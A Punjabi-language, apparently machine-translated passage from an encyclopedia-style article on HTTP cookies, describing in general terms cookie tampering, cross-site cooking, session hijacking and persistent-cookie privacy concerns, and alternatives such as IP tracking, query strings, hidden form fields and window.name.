ਵਿਧੀ ਦੁਆਰਾ ਸੈਸ਼ਨ ਕੂਕੀਜ਼ ਨੂੰ ਪੜ੍ਹਨ ਅਤੇ ਲਿਖਣ ਤੋਂ ਰੋਕਣ ਦਾ ਵਰਤਮਾਨ ਵਿੱਚ ਕੋਈ ਤਰੀਕਾ ਨਹੀਂ ਹੈ।
ਸਮੱਗਰੀ ਦੀ ਸੋਧ: ਇੱਕ ਹਮਲਾਵਰ ਇੱਕ ਸਰਵਰ ਨੂੰ ਇੱਕ ਅਵੈਧ ਕੂਕੀ ਭੇਜਦਾ ਹੈ, ਸੰਭਵ ਤੌਰ 'ਤੇ ਸਰਵਰ ਦੁਆਰਾ ਭੇਜੀ ਗਈ ਇੱਕ ਵੈਧ ਕੂਕੀ ਤੋਂ ਬਣਾਇਆ ਗਿਆ ਹੈ।
ਕੂਕੀਜ਼ ਨੂੰ ਬਦਲਣਾ
ਜਿਵੇਂ ਹੀ ਕੂਕੀਜ਼ ਨੂੰ ਸਟੋਰ ਕਰਨ ਅਤੇ ਸਰਵਰ 'ਤੇ ਬਿਨਾਂ ਕਿਸੇ ਬਦਲਾਅ ਦੇ ਵਾਪਸ ਕਰਨ ਦੀ ਲੋੜ ਹੁੰਦੀ ਹੈ, ਹਮਲਾਵਰ ਕੂਕੀਜ਼ ਨੂੰ ਸਰਵਰ 'ਤੇ ਵਾਪਸ ਭੇਜਣ ਤੋਂ ਪਹਿਲਾਂ ਉਹਨਾਂ ਦੇ ਮੁੱਲ ਨੂੰ ਸੋਧ ਸਕਦਾ ਹੈ। ਉਦਾਹਰਨ ਲਈ, ਜੇਕਰ ਇੱਕ ਕੂਕੀ ਵਿੱਚ ਸਟੋਰ ਦੇ ਸ਼ਾਪਿੰਗ ਕਾਰਟ ਵਿੱਚ ਰੱਖੀਆਂ ਆਈਟਮਾਂ ਲਈ ਉਪਭੋਗਤਾ ਨੂੰ ਭੁਗਤਾਨ ਕਰਨਾ ਪੈਂਦਾ ਹੈ, ਤਾਂ ਇਸ ਮੁੱਲ ਨੂੰ ਬਦਲਣ ਨਾਲ ਸਰਵਰ ਨੂੰ ਹਮਲਾਵਰ ਤੋਂ ਸ਼ੁਰੂਆਤੀ ਕੀਮਤ ਤੋਂ ਘੱਟ ਚਾਰਜ ਕਰਨ ਦੇ ਜੋਖਮ ਦਾ ਸਾਹਮਣਾ ਕਰਨਾ ਪੈਂਦਾ ਹੈ। ਕੂਕੀਜ਼ ਦੇ ਮੁੱਲ ਨੂੰ ਸੋਧਣ ਦੀ ਪ੍ਰਕਿਰਿਆ ਨੂੰ ਕਿਹਾ ਜਾਂਦਾ ਹੈ ਕੂਕੀਜ਼ ਜ਼ਹਿਰ ਅਤੇ ਹਮਲੇ ਨੂੰ ਨਿਰੰਤਰ ਬਣਾਉਣ ਲਈ ਕੂਕੀ ਚੋਰੀ ਤੋਂ ਬਾਅਦ ਵਰਤਿਆ ਜਾ ਸਕਦਾ ਹੈ।
ਕੂਕੀ ਓਵਰਰਾਈਡ ਵਿਧੀ ਵਿੱਚ, ਹਮਲਾਵਰ ਸਰਵਰ ਨੂੰ ਇੱਕ ਅਵੈਧ ਕੂਕੀ ਭੇਜਣ ਲਈ ਇੱਕ ਬ੍ਰਾਊਜ਼ਰ ਗੜਬੜ ਦਾ ਸ਼ੋਸ਼ਣ ਕਰਦਾ ਹੈ।
ਜ਼ਿਆਦਾਤਰ ਵੈੱਬਸਾਈਟਾਂ, ਹਾਲਾਂਕਿ, ਸਿਰਫ਼ ਇੱਕ ਸੈਸ਼ਨ ID ਨੂੰ ਸਟੋਰ ਕਰਦੀਆਂ ਹਨ — ਸ਼ੈਸ਼ਨ ਉਪਭੋਗਤਾ ਦੀ ਪਛਾਣ ਕਰਨ ਲਈ ਇੱਕ ਬੇਤਰਤੀਬੇ ਤੌਰ 'ਤੇ ਤਿਆਰ ਕੀਤਾ ਗਿਆ ਵਿਲੱਖਣ ਨੰਬਰ — ਕੂਕੀ ਵਿੱਚ ਹੀ, ਜਦੋਂ ਕਿ ਬਾਕੀ ਸਾਰੀ ਜਾਣਕਾਰੀ ਸਰਵਰ 'ਤੇ ਸਟੋਰ ਕੀਤੀ ਜਾਂਦੀ ਹੈ। ਇਸ ਮਾਮਲੇ ਵਿੱਚ, ਇਸ ਸਮੱਸਿਆ ਨੂੰ ਕਾਫ਼ੀ ਹੱਦ ਤੱਕ ਹੱਲ ਕੀਤਾ ਗਿਆ ਹੈ.
ਵੈੱਬਸਾਈਟਾਂ ਵਿਚਕਾਰ ਕੂਕੀ ਹੈਂਡਲਿੰਗ
ਹਰੇਕ ਸਾਈਟ ਦੀਆਂ ਆਪਣੀਆਂ ਕੂਕੀਜ਼ ਹੋਣ ਦੀ ਉਮੀਦ ਕੀਤੀ ਜਾਂਦੀ ਹੈ, ਇਸਲਈ ਇੱਕ ਸਾਈਟ ਨੂੰ ਦੂਜੀ ਸਾਈਟ ਨਾਲ ਸੰਬੰਧਿਤ ਕੂਕੀਜ਼ ਨੂੰ ਸੋਧਣ ਜਾਂ ਬਣਾਉਣ ਦੇ ਯੋਗ ਨਹੀਂ ਹੋਣਾ ਚਾਹੀਦਾ ਹੈ। ਇੱਕ ਵੈੱਬ ਬ੍ਰਾਊਜ਼ਰ ਸੁਰੱਖਿਆ ਨੁਕਸ ਖਤਰਨਾਕ ਸਾਈਟਾਂ ਨੂੰ ਇਸ ਨਿਯਮ ਨੂੰ ਤੋੜਨ ਦੀ ਇਜਾਜ਼ਤ ਦੇ ਸਕਦਾ ਹੈ। ਅਜਿਹੇ ਫਲਾਅ ਦੇ ਸ਼ੋਸ਼ਣ ਨੂੰ ਆਮ ਤੌਰ 'ਤੇ ਕਿਹਾ ਜਾਂਦਾ ਹੈ ਕਰਾਸ-ਸਾਈਟ ਖਾਣਾ ਪਕਾਉਣਾ. ਅਜਿਹੇ ਹਮਲਿਆਂ ਦਾ ਉਦੇਸ਼ ਸੈਸ਼ਨ ਆਈਡੀ ਚੋਰੀ ਹੋ ਸਕਦਾ ਹੈ।
ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਵੈਬ ਬ੍ਰਾਉਜ਼ਰਾਂ ਦੇ ਨਵੀਨਤਮ ਸੰਸਕਰਣਾਂ ਦੀ ਵਰਤੋਂ ਕਰਨੀ ਚਾਹੀਦੀ ਹੈ ਜਿਸ ਵਿੱਚ ਇਹ ਕਮਜ਼ੋਰੀਆਂ ਲਗਭਗ ਖਤਮ ਹੋ ਜਾਂਦੀਆਂ ਹਨ।
ਕਲਾਇੰਟ ਅਤੇ ਸਰਵਰ ਵਿਚਕਾਰ ਵਿਰੋਧੀ ਸਥਿਤੀ
ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਕਲਾਇੰਟ ਦੀ ਸਥਿਤੀ ਅਤੇ ਕੂਕੀ ਵਿੱਚ ਸਟੋਰ ਕੀਤੀ ਸਟੇਟ ਦੇ ਵਿਚਕਾਰ ਇੱਕ ਵਿਰੋਧਾਭਾਸ ਪੈਦਾ ਕਰ ਸਕਦੀ ਹੈ। ਜੇਕਰ ਉਪਭੋਗਤਾ ਇੱਕ ਕੂਕੀ ਪ੍ਰਾਪਤ ਕਰਦਾ ਹੈ ਅਤੇ ਬ੍ਰਾਊਜ਼ਰ ਦੇ "ਬੈਕ" ਬਟਨ 'ਤੇ ਕਲਿੱਕ ਕਰਦਾ ਹੈ, ਤਾਂ ਬ੍ਰਾਊਜ਼ਰ ਦੀ ਸਥਿਤੀ ਆਮ ਤੌਰ 'ਤੇ ਇਸ ਪ੍ਰਾਪਤੀ ਤੋਂ ਪਹਿਲਾਂ ਵਰਗੀ ਨਹੀਂ ਹੁੰਦੀ ਹੈ। ਉਦਾਹਰਨ ਲਈ, ਜੇਕਰ ਇੱਕ ਔਨਲਾਈਨ ਸਟੋਰ ਦੀ ਟੋਕਰੀ ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਬਣਾਈ ਗਈ ਹੈ, ਤਾਂ ਟੋਕਰੀ ਦੀ ਸਮੱਗਰੀ ਉਦੋਂ ਬਦਲ ਨਹੀਂ ਸਕਦੀ ਜਦੋਂ ਉਪਭੋਗਤਾ ਬ੍ਰਾਊਜ਼ਰ ਇਤਿਹਾਸ ਵਿੱਚ ਵਾਪਸ ਆਉਂਦਾ ਹੈ: ਜੇਕਰ ਉਪਭੋਗਤਾ ਆਪਣੀ ਟੋਕਰੀ ਵਿੱਚ ਇੱਕ ਲੇਖ ਜੋੜਨ ਲਈ ਇੱਕ ਬਟਨ ਦਬਾਉਦਾ ਹੈ ਅਤੇ "ਰਿਟਰਨ" ਤੇ ਕਲਿਕ ਕਰਦਾ ਹੈ " ਬਟਨ, ਲੇਖ ਇਸ ਵਿੱਚ ਰਹਿੰਦਾ ਹੈ। ਇਹ ਉਪਭੋਗਤਾ ਦਾ ਇਰਾਦਾ ਨਹੀਂ ਹੋ ਸਕਦਾ ਹੈ, ਜੋ ਨਿਸ਼ਚਤ ਤੌਰ 'ਤੇ ਲੇਖ ਦੇ ਜੋੜ ਨੂੰ ਰੱਦ ਕਰਨਾ ਚਾਹੁੰਦਾ ਹੈ. ਇਸ ਨਾਲ ਭਰੋਸੇਯੋਗਤਾ, ਉਲਝਣ ਅਤੇ ਬੱਗ ਹੋ ਸਕਦੇ ਹਨ। ਇਸ ਲਈ ਵੈਬ ਡਿਵੈਲਪਰਾਂ ਨੂੰ ਇਸ ਸਮੱਸਿਆ ਤੋਂ ਜਾਣੂ ਹੋਣਾ ਚਾਹੀਦਾ ਹੈ ਅਤੇ ਇਸ ਤਰ੍ਹਾਂ ਦੀਆਂ ਸਥਿਤੀਆਂ ਨੂੰ ਸੰਭਾਲਣ ਲਈ ਉਪਾਅ ਲਾਗੂ ਕਰਨਾ ਚਾਹੀਦਾ ਹੈ।
ਕੂਕੀ ਦੀ ਮਿਆਦ ਸਮਾਪਤੀ
ਸਥਾਈ ਕੂਕੀਜ਼ ਦੀ ਗੋਪਨੀਯਤਾ ਸੁਰੱਖਿਆ ਮਾਹਰਾਂ ਦੁਆਰਾ ਆਲੋਚਨਾ ਕੀਤੀ ਗਈ ਹੈ ਕਿਉਂਕਿ ਉਹਨਾਂ ਦੀ ਮਿਆਦ ਜਲਦੀ ਖਤਮ ਹੋਣ ਲਈ ਸੈੱਟ ਨਹੀਂ ਕੀਤੀ ਗਈ ਹੈ, ਜਿਸ ਨਾਲ ਵੈੱਬਸਾਈਟਾਂ ਨੂੰ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਟਰੈਕ ਕਰਨ ਅਤੇ ਸਮੇਂ ਦੇ ਨਾਲ ਉਹਨਾਂ ਦੀ ਪ੍ਰੋਫਾਈਲ ਬਣਾਉਣ ਦੀ ਇਜਾਜ਼ਤ ਮਿਲਦੀ ਹੈ। ਕੂਕੀਜ਼ ਦਾ ਇਹ ਪਹਿਲੂ ਸੈਸ਼ਨ ਹਾਈਜੈਕਿੰਗ ਸਮੱਸਿਆ ਦਾ ਵੀ ਹਿੱਸਾ ਹੈ, ਕਿਉਂਕਿ ਇੱਕ ਚੋਰੀ ਹੋਈ ਨਿਰੰਤਰ ਕੂਕੀ ਦੀ ਵਰਤੋਂ ਕਾਫ਼ੀ ਸਮੇਂ ਲਈ ਇੱਕ ਉਪਭੋਗਤਾ ਦੀ ਨਕਲ ਕਰਨ ਲਈ ਕੀਤੀ ਜਾ ਸਕਦੀ ਹੈ।
ਇਹ ਵੀ ਪੜ੍ਹਨਾ: ਗਫਾਮ: ਉਹ ਕੌਣ ਹਨ? ਉਹ (ਕਈ ਵਾਰ) ਇੰਨੇ ਡਰਾਉਣੇ ਕਿਉਂ ਹੁੰਦੇ ਹਨ?
ਕੂਕੀਜ਼ ਦੇ ਵਿਕਲਪ
ਕੁਝ ਓਪਰੇਸ਼ਨ ਜੋ ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਕੀਤੇ ਜਾ ਸਕਦੇ ਹਨ, ਉਹਨਾਂ ਹੋਰ ਵਿਧੀਆਂ ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਵੀ ਕੀਤੇ ਜਾ ਸਕਦੇ ਹਨ ਜੋ ਕੂਕੀਜ਼ ਨੂੰ ਬਾਈਪਾਸ ਕਰਦੇ ਹਨ ਜਾਂ ਮਿਟਾਈਆਂ ਗਈਆਂ ਕੂਕੀਜ਼ ਨੂੰ ਮੁੜ ਬਣਾਉਂਦੇ ਹਨ, ਜੋ ਕਿ ਕੂਕੀਜ਼ ਨਾਲੋਂ ਉਸੇ ਤਰੀਕੇ ਨਾਲ (ਜਾਂ ਕਈ ਵਾਰ ਅਦਿੱਖ ਹੋਣ ਕਾਰਨ ਬਦਤਰ) ਗੋਪਨੀਯਤਾ ਮੁੱਦੇ ਪੈਦਾ ਕਰਦੇ ਹਨ।
IP ਪਤਾ
ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਪੰਨੇ 'ਤੇ ਕਾਲ ਕਰਨ ਵਾਲੇ ਕੰਪਿਊਟਰ ਦੇ IP ਐਡਰੈੱਸ ਨਾਲ ਟਰੈਕ ਕੀਤਾ ਜਾ ਸਕਦਾ ਹੈ। ਇਹ ਤਕਨੀਕ ਵਰਲਡ ਵਾਈਡ ਵੈੱਬ ਦੀ ਸ਼ੁਰੂਆਤ ਤੋਂ ਹੀ ਉਪਲਬਧ ਹੈ, ਕਿਉਂਕਿ ਪੰਨੇ ਡਾਊਨਲੋਡ ਕੀਤੇ ਜਾਂਦੇ ਹਨ ਸਰਵਰ ਬ੍ਰਾਊਜ਼ਰ ਜਾਂ ਪ੍ਰੌਕਸੀ ਚਲਾ ਰਹੇ ਕੰਪਿਊਟਰ ਦੇ IP ਐਡਰੈੱਸ ਦੀ ਬੇਨਤੀ ਕਰਦਾ ਹੈ, ਜੇਕਰ ਕੋਈ ਵੀ ਵਰਤਿਆ ਨਹੀਂ ਜਾਂਦਾ ਹੈ। ਸਰਵਰ ਇਸ ਜਾਣਕਾਰੀ ਨੂੰ ਟ੍ਰੈਕ ਕਰ ਸਕਦਾ ਹੈ ਕਿ ਕੀ ਵਰਤੋਂ ਵਿੱਚ ਕੂਕੀਜ਼ ਹਨ ਜਾਂ ਨਹੀਂ। ਹਾਲਾਂਕਿ, ਇਹ ਪਤੇ ਆਮ ਤੌਰ 'ਤੇ ਕੂਕੀਜ਼ ਨਾਲੋਂ ਇੱਕ ਉਪਭੋਗਤਾ ਦੀ ਪਛਾਣ ਕਰਨ ਵਿੱਚ ਘੱਟ ਭਰੋਸੇਮੰਦ ਹੁੰਦੇ ਹਨ ਕਿਉਂਕਿ ਕੰਪਿਊਟਰ ਅਤੇ ਪ੍ਰੌਕਸੀ ਇੱਕ ਤੋਂ ਵੱਧ ਉਪਭੋਗਤਾਵਾਂ ਦੁਆਰਾ ਸਾਂਝੇ ਕੀਤੇ ਜਾ ਸਕਦੇ ਹਨ, ਅਤੇ ਇੱਕੋ ਕੰਪਿਊਟਰ ਹਰੇਕ ਕੰਮ ਦੇ ਸੈਸ਼ਨ ਵਿੱਚ ਇੱਕ ਵੱਖਰਾ IP ਪਤਾ ਪ੍ਰਾਪਤ ਕਰ ਸਕਦਾ ਹੈ (ਜਿਵੇਂ ਕਿ c ਅਕਸਰ ਟੈਲੀਫੋਨ ਕਨੈਕਸ਼ਨਾਂ ਲਈ ਕੇਸ) .
IP ਐਡਰੈੱਸ ਦੁਆਰਾ ਟਰੈਕਿੰਗ ਕੁਝ ਸਥਿਤੀਆਂ ਵਿੱਚ ਭਰੋਸੇਯੋਗ ਹੋ ਸਕਦੀ ਹੈ, ਜਿਵੇਂ ਕਿ ਬ੍ਰੌਡਬੈਂਡ ਕਨੈਕਸ਼ਨ ਜੋ ਲੰਬੇ ਸਮੇਂ ਲਈ ਇੱਕੋ IP ਪਤੇ ਨੂੰ ਕਾਇਮ ਰੱਖਦੇ ਹਨ, ਜਦੋਂ ਤੱਕ ਪਾਵਰ ਚਾਲੂ ਹੈ।
ਟੋਰ ਵਰਗੇ ਕੁਝ ਸਿਸਟਮ ਇੰਟਰਨੈਟ ਦੀ ਗੁਮਨਾਮਤਾ ਨੂੰ ਬਣਾਈ ਰੱਖਣ ਅਤੇ IP ਐਡਰੈੱਸ ਦੁਆਰਾ ਟਰੈਕਿੰਗ ਨੂੰ ਅਸੰਭਵ ਜਾਂ ਅਵਿਵਹਾਰਕ ਬਣਾਉਣ ਲਈ ਤਿਆਰ ਕੀਤੇ ਗਏ ਹਨ।
URL ਨੂੰ
ਇੱਕ ਹੋਰ ਸਟੀਕ ਤਕਨੀਕ URL ਵਿੱਚ ਏਮਬੈਡਿੰਗ ਜਾਣਕਾਰੀ 'ਤੇ ਅਧਾਰਤ ਹੈ। URL ਦਾ ਕਿਊਰੀ ਸਟ੍ਰਿੰਗ ਹਿੱਸਾ ਇੱਕ ਤਕਨੀਕ ਹੈ ਜੋ ਆਮ ਤੌਰ 'ਤੇ ਇਸ ਉਦੇਸ਼ ਲਈ ਵਰਤੀ ਜਾਂਦੀ ਹੈ, ਪਰ ਦੂਜੇ ਭਾਗ ਵੀ ਵਰਤੇ ਜਾ ਸਕਦੇ ਹਨ। ਜਾਵਾ ਸਰਵਰਲੇਟ ਅਤੇ PHP ਸੈਸ਼ਨ ਮਕੈਨਿਜ਼ਮ ਦੋਵੇਂ ਇਸ ਵਿਧੀ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹਨ ਜੇਕਰ ਕੂਕੀਜ਼ ਸਮਰੱਥ ਨਹੀਂ ਹਨ।
ਇਸ ਵਿਧੀ ਵਿੱਚ ਵੈਬ ਸਰਵਰ ਦੁਆਰਾ ਵੈਬ ਪੇਜ ਦੇ ਲਿੰਕਾਂ ਵਿੱਚ ਸਟ੍ਰਿੰਗ ਬੇਨਤੀਆਂ ਨੂੰ ਸ਼ਾਮਲ ਕਰਨਾ ਸ਼ਾਮਲ ਹੁੰਦਾ ਹੈ ਜੋ ਇਸਨੂੰ ਬਰਾਊਜ਼ਰ ਨੂੰ ਭੇਜੇ ਜਾਣ 'ਤੇ ਲੈ ਜਾਂਦਾ ਹੈ। ਜਦੋਂ ਉਪਭੋਗਤਾ ਇੱਕ ਲਿੰਕ ਦੀ ਪਾਲਣਾ ਕਰਦਾ ਹੈ, ਤਾਂ ਬ੍ਰਾਊਜ਼ਰ ਸਰਵਰ ਨੂੰ ਨੱਥੀ ਪੁੱਛਗਿੱਛ ਸਤਰ ਵਾਪਸ ਕਰਦਾ ਹੈ।
ਇਸ ਉਦੇਸ਼ ਲਈ ਵਰਤੀਆਂ ਗਈਆਂ ਪੁੱਛਗਿੱਛ ਸਤਰ ਅਤੇ ਕੂਕੀਜ਼ ਬਹੁਤ ਸਮਾਨ ਹਨ, ਦੋਵੇਂ ਜਾਣਕਾਰੀ ਸਰਵਰ ਦੁਆਰਾ ਮਨਮਾਨੇ ਢੰਗ ਨਾਲ ਚੁਣੀ ਜਾਂਦੀ ਹੈ ਅਤੇ ਬ੍ਰਾਊਜ਼ਰ ਦੁਆਰਾ ਵਾਪਸ ਕੀਤੀ ਜਾਂਦੀ ਹੈ। ਹਾਲਾਂਕਿ, ਕੁਝ ਅੰਤਰ ਹਨ: ਜਦੋਂ ਇੱਕ ਪੁੱਛਗਿੱਛ ਸਤਰ ਵਾਲੇ URL ਦੀ ਮੁੜ ਵਰਤੋਂ ਕੀਤੀ ਜਾਂਦੀ ਹੈ, ਤਾਂ ਉਹੀ ਜਾਣਕਾਰੀ ਸਰਵਰ ਨੂੰ ਭੇਜੀ ਜਾਂਦੀ ਹੈ। ਉਦਾਹਰਨ ਲਈ, ਜੇਕਰ ਕਿਸੇ ਉਪਭੋਗਤਾ ਦੀਆਂ ਤਰਜੀਹਾਂ ਨੂੰ ਇੱਕ URL ਦੀ ਇੱਕ ਪੁੱਛਗਿੱਛ ਸਤਰ ਵਿੱਚ ਏਨਕੋਡ ਕੀਤਾ ਗਿਆ ਹੈ ਅਤੇ ਉਪਭੋਗਤਾ ਉਸ URL ਨੂੰ ਕਿਸੇ ਹੋਰ ਉਪਭੋਗਤਾ ਨੂੰ ਈਮੇਲ ਰਾਹੀਂ ਭੇਜਦਾ ਹੈ, ਤਾਂ ਉਹ ਉਪਭੋਗਤਾ ਉਹਨਾਂ ਤਰਜੀਹਾਂ ਦੀ ਵਰਤੋਂ ਕਰਨ ਦੇ ਯੋਗ ਵੀ ਹੋਵੇਗਾ।
ਦੂਜੇ ਪਾਸੇ, ਜਦੋਂ ਇੱਕ ਉਪਭੋਗਤਾ ਇੱਕੋ ਪੰਨੇ ਨੂੰ ਦੋ ਵਾਰ ਐਕਸੈਸ ਕਰਦਾ ਹੈ, ਤਾਂ ਇਸ ਗੱਲ ਦੀ ਕੋਈ ਗਾਰੰਟੀ ਨਹੀਂ ਹੈ ਕਿ ਇੱਕੋ ਸਵਾਲ ਦੀ ਸਤਰ ਦੋਵਾਂ ਵਾਰ ਵਰਤੀ ਜਾਵੇਗੀ। ਉਦਾਹਰਨ ਲਈ, ਜੇਕਰ ਕੋਈ ਉਪਭੋਗਤਾ ਪਹਿਲੀ ਵਾਰ ਕਿਸੇ ਅੰਦਰੂਨੀ ਸਾਈਟ ਪੰਨੇ ਤੋਂ ਕਿਸੇ ਪੰਨੇ 'ਤੇ ਉਤਰਦਾ ਹੈ ਅਤੇ ਦੂਜੀ ਵਾਰ ਕਿਸੇ ਬਾਹਰੀ ਪੰਨੇ ਤੋਂ ਉਸੇ ਪੰਨੇ 'ਤੇ ਉਤਰਦਾ ਹੈ, ਤਾਂ ਸਾਈਟ ਪੰਨੇ ਨਾਲ ਸੰਬੰਧਿਤ ਪੁੱਛਗਿੱਛ ਸਤਰ ਆਮ ਤੌਰ 'ਤੇ ਵੱਖਰੀ ਹੁੰਦੀ ਹੈ, ਜਦੋਂ ਕਿ ਕੂਕੀਜ਼ ਇੱਕੋ ਜਿਹੀਆਂ ਹੁੰਦੀਆਂ ਹਨ। .
ਪੁੱਛਗਿੱਛ ਸਤਰ ਦੇ ਹੋਰ ਨੁਕਸਾਨ ਸੁਰੱਖਿਆ ਨਾਲ ਸਬੰਧਤ ਹਨ: ਪੁੱਛਗਿੱਛ ਸਤਰ ਵਿੱਚ ਇੱਕ ਸੈਸ਼ਨ ਦੀ ਪਛਾਣ ਕਰਨ ਵਾਲੇ ਡੇਟਾ ਨੂੰ ਰੱਖਣਾ ਸੈਸ਼ਨ ਫਿਕਸੇਸ਼ਨ ਹਮਲਿਆਂ, ਪਛਾਣਕਰਤਾ ਸੰਦਰਭ ਹਮਲਿਆਂ, ਅਤੇ ਹੋਰ ਸ਼ੋਸ਼ਣਾਂ ਨੂੰ ਸਮਰੱਥ ਜਾਂ ਸਰਲ ਬਣਾਉਂਦਾ ਹੈ। ਸੈਸ਼ਨ ID ਨੂੰ HTTP ਕੂਕੀਜ਼ ਵਜੋਂ ਪਾਸ ਕਰਨਾ ਵਧੇਰੇ ਸੁਰੱਖਿਅਤ ਹੈ।
ਲੁਕਿਆ ਹੋਇਆ ਫਾਰਮ ਖੇਤਰ
ਸੈਸ਼ਨ ਟਰੈਕਿੰਗ ਦਾ ਇੱਕ ਰੂਪ, ASP.NET ਦੁਆਰਾ ਵਰਤਿਆ ਜਾਂਦਾ ਹੈ, ਲੁਕਵੇਂ ਖੇਤਰਾਂ ਦੇ ਨਾਲ ਵੈਬ ਫਾਰਮਾਂ ਦੀ ਵਰਤੋਂ ਕਰਨਾ ਹੈ। ਇਹ ਤਕਨੀਕ ਜਾਣਕਾਰੀ ਨੂੰ ਲੈ ਕੇ ਜਾਣ ਲਈ URL ਕਿਊਰੀ ਸਤਰ ਦੀ ਵਰਤੋਂ ਕਰਨ ਦੇ ਸਮਾਨ ਹੈ ਅਤੇ ਇਸਦੇ ਇੱਕੋ ਜਿਹੇ ਫਾਇਦੇ ਅਤੇ ਨੁਕਸਾਨ ਹਨ; ਅਤੇ ਜੇਕਰ ਫਾਰਮ ਨੂੰ HTTP GET ਵਿਧੀ ਨਾਲ ਪ੍ਰੋਸੈਸ ਕੀਤਾ ਜਾਂਦਾ ਹੈ, ਤਾਂ ਖੇਤਰ ਅਸਲ ਵਿੱਚ ਬ੍ਰਾਊਜ਼ਰ ਦੇ URL ਦਾ ਹਿੱਸਾ ਬਣ ਜਾਂਦੇ ਹਨ ਜੋ ਫਾਰਮ ਨੂੰ ਜਮ੍ਹਾਂ ਕਰਨ ਵੇਲੇ ਇਸਨੂੰ ਭੇਜੇਗਾ। ਪਰ ਜ਼ਿਆਦਾਤਰ ਫਾਰਮਾਂ ਨੂੰ HTTP POST ਨਾਲ ਸੰਸਾਧਿਤ ਕੀਤਾ ਜਾਂਦਾ ਹੈ, ਜਿਸ ਨਾਲ ਫਾਰਮ ਦੀ ਜਾਣਕਾਰੀ, ਲੁਕਵੇਂ ਖੇਤਰਾਂ ਸਮੇਤ, ਨੂੰ ਇੱਕ ਵਾਧੂ ਇਨਪੁਟ ਵਜੋਂ ਜੋੜਿਆ ਜਾਂਦਾ ਹੈ ਜੋ ਨਾ ਤਾਂ URL ਦਾ ਹਿੱਸਾ ਹੈ ਅਤੇ ਨਾ ਹੀ ਕੂਕੀ।
ਇਸ ਪਹੁੰਚ ਦੇ ਇੱਕ ਟਰੈਕਿੰਗ ਦ੍ਰਿਸ਼ਟੀਕੋਣ ਤੋਂ ਦੋ ਫਾਇਦੇ ਹਨ: ਪਹਿਲਾਂ, URL ਦੀ ਬਜਾਏ HTML ਸਰੋਤ ਕੋਡ ਅਤੇ POST ਇਨਪੁਟ ਵਿੱਚ ਰੱਖੀ ਗਈ ਜਾਣਕਾਰੀ ਨੂੰ ਟਰੈਕ ਕਰਨਾ ਔਸਤ ਉਪਭੋਗਤਾ ਨੂੰ ਇਸ ਟਰੈਕਿੰਗ ਤੋਂ ਬਚਣ ਦੀ ਇਜਾਜ਼ਤ ਦੇਵੇਗਾ; ਦੂਜਾ, ਜਦੋਂ ਉਪਭੋਗਤਾ URL ਦੀ ਨਕਲ ਕਰਦਾ ਹੈ ਤਾਂ ਸੈਸ਼ਨ ਜਾਣਕਾਰੀ ਦੀ ਨਕਲ ਨਹੀਂ ਕੀਤੀ ਜਾਂਦੀ (ਉਦਾਹਰਣ ਲਈ, ਪੰਨੇ ਨੂੰ ਡਿਸਕ 'ਤੇ ਸੁਰੱਖਿਅਤ ਕਰਨ ਜਾਂ ਈਮੇਲ ਰਾਹੀਂ ਭੇਜਣ ਲਈ)।
ਵਿੰਡੋ।ਨਾਮ
ਸਾਰੇ ਆਮ ਵੈੱਬ ਬ੍ਰਾਊਜ਼ਰ DOM ਦੀ window.name ਵਿਸ਼ੇਸ਼ਤਾ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹੋਏ JavaScript ਰਾਹੀਂ ਬਹੁਤ ਸਾਰਾ ਡਾਟਾ (2MB ਤੋਂ 32MB) ਸਟੋਰ ਕਰ ਸਕਦੇ ਹਨ। ਇਹ ਡੇਟਾ ਸੈਸ਼ਨ ਕੂਕੀਜ਼ ਦੀ ਬਜਾਏ ਵਰਤਿਆ ਜਾ ਸਕਦਾ ਹੈ ਅਤੇ ਡੋਮੇਨਾਂ ਵਿੱਚ ਵੀ ਵਰਤਿਆ ਜਾਂਦਾ ਹੈ। ਕਲਾਇੰਟ-ਸਾਈਡ ਸੈਸ਼ਨ ਵੇਰੀਏਬਲ ਦੇ ਇੱਕ ਗੁੰਝਲਦਾਰ ਸੈੱਟ ਨੂੰ ਸਟੋਰ ਕਰਨ ਲਈ ਤਕਨੀਕ ਨੂੰ JSON ਵਸਤੂਆਂ ਨਾਲ ਜੋੜਿਆ ਜਾ ਸਕਦਾ ਹੈ।
ਨਨੁਕਸਾਨ ਇਹ ਹੈ ਕਿ ਹਰੇਕ ਵੱਖਰੀ ਵਿੰਡੋ ਜਾਂ ਟੈਬ ਵਿੱਚ ਸ਼ੁਰੂ ਵਿੱਚ ਇੱਕ ਖਾਲੀ window.name ਹੋਵੇਗੀ; ਜਦੋਂ ਟੈਬਾਂ ਦੁਆਰਾ ਬ੍ਰਾਊਜ਼ਿੰਗ ਕੀਤੀ ਜਾਂਦੀ ਹੈ (ਉਪਭੋਗਤਾ ਦੁਆਰਾ ਖੋਲ੍ਹੀ ਜਾਂਦੀ ਹੈ) ਇਸਦਾ ਮਤਲਬ ਹੈ ਕਿ ਵਿਅਕਤੀਗਤ ਤੌਰ 'ਤੇ ਖੋਲ੍ਹੀਆਂ ਗਈਆਂ ਟੈਬਾਂ ਦਾ ਵਿੰਡੋ ਨਾਮ ਨਹੀਂ ਹੋਵੇਗਾ। ਇਸ ਤੋਂ ਇਲਾਵਾ window.name ਦੀ ਵਰਤੋਂ ਵੱਖ-ਵੱਖ ਸਾਈਟਾਂ 'ਤੇ ਵਿਜ਼ਿਟਰਾਂ ਨੂੰ ਟਰੈਕ ਕਰਨ ਲਈ ਕੀਤੀ ਜਾ ਸਕਦੀ ਹੈ ਜੋ ਗੋਪਨੀਯਤਾ ਦੀ ਚਿੰਤਾ ਪੈਦਾ ਕਰ ਸਕਦੀਆਂ ਹਨ।
